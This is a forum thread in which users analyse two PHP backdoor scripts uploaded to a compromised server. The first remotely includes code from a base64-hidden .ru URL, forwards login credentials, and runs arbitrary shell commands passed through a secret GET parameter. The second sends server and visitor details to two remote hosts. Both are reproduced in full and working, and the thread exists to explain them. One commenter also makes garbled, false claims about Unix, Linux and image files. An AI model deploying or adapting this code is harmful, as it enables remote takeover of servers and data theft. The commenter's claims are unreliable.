just need to know what this code does...

[joecooper]

can someone in detail explain what exactly this code does? thanks. i good with php but this looks complex to me!

[code]<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>[/code]

[redarrow]

name
password
url


<?php
error_reporting(0);// error reporting off

if(isset($_POST["l"]) and isset($_POST["p"])){ // post name and password

if(isset($_POST["input"])){$user_auth="&l=".
base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
// post name and password encode them.


else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}//post name and password encoded


if(!isset($_POST["log_flg"])){$log_flg="&log";}
// if name and password exiat encoded


if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
// decode the name password and the url via ip


{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
//get name and password if active and post information
?>

[hitman6003]

did you get hacked joe?

cause this looks like part of the authentication for a hacking script...it sends info to a russian site to verify the username and password, and if it returns a certain value, executes some system commands.

[joecooper]

i didnt get hacked, but someone i know has. and that was the scipt that was uploaded


i see now. i decoded the base64 code and it returned

http://bis.iframe.ru/master.php?r_addr=

[hitman6003]

I have a friend get hacked as well over the past week.  He ended up with a hacker script that opens up a huge backdoor...luckily the hacker wasn't smart and named it something very obvious, so he was able to quickly pick it out from all his other scripts.

[joecooper]

how about this code that was also uploaded

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

[redarrow]

ip.
88.151.116.6

company url
http://ns0.ru/

the above code seems to be able to get and add database information to another database ok.

[hitman6003]

Same type thing, but this time it sends all of your server information:
[code]
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
[/code]
to a server somewhere...if the first one fails, it goes to a second.

[hitman6003]

looks like the two servers are:

http://user9.mshtml.ru
http://user7.htmltags.ru

[joecooper]

how can a php script open a back door tho? it cant exactly edit files unless they are chmod 777... and not many people have many folders set as chmodd

[redarrow]

the url are part of the first url i posted.

[hitman6003]

once the script is on your server it can do a chmod on them just like you can.  I set up a VM and ran the script that was left on my friends server...I was able to see the entire directory structure...the hd, the cd drive, the floppy drive...I could execute command line scripts and such...I could manipulate any of the files on the server I wanted.

In his particular case there is a security hole in one of the earlier versions of the smf bridge for joomla that the hacker exploited. 

[redarrow]

most hackers can upload a code that is also in a photo then the code posts information back to the hacker.

The hacker is only intrested in the open ports to meachines hanging off the server for example a credit card server.

there are thousands of tolls and thosands of holes in computer programs i know for a fact that large well known companys out there have got vanable hotspots on operating systems to get into all meachines linked to the net.

in reel reality there is no such thing as secuity as were like to know it, there will always be back doors to all programs as computer developers use hackers there self for development fact.

[joecooper]

how do you mean by they can upload code in a photo. do you mean they have a .php file labled as a .jpg.... because the server wouldnt parse this as a phpfile, would only output the code to the user

[hitman6003]

.gif files can contain executable code.

EDIT:  Not php, but other languages...not sure which...never looked into it.

[redarrow]

the most powerfull hackers that are around are the ones involved in unixs thats why linux is a cut down version.

unix programing with meachine code is like owning a bank lol........................

[trq]

[quote]the most powerfull hackers that are around are the ones involved in unixs thats why linux is a cut down version.[/quote]
What are you babling about?